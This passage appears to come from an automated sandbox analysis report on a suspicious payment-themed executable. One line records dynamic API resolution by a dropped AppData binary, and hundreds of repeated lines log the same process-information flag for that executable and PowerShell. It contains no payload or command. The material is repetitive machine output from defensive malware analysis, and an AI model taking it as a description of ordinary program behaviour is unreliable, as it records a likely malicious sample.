            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,13_2_00407D38
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
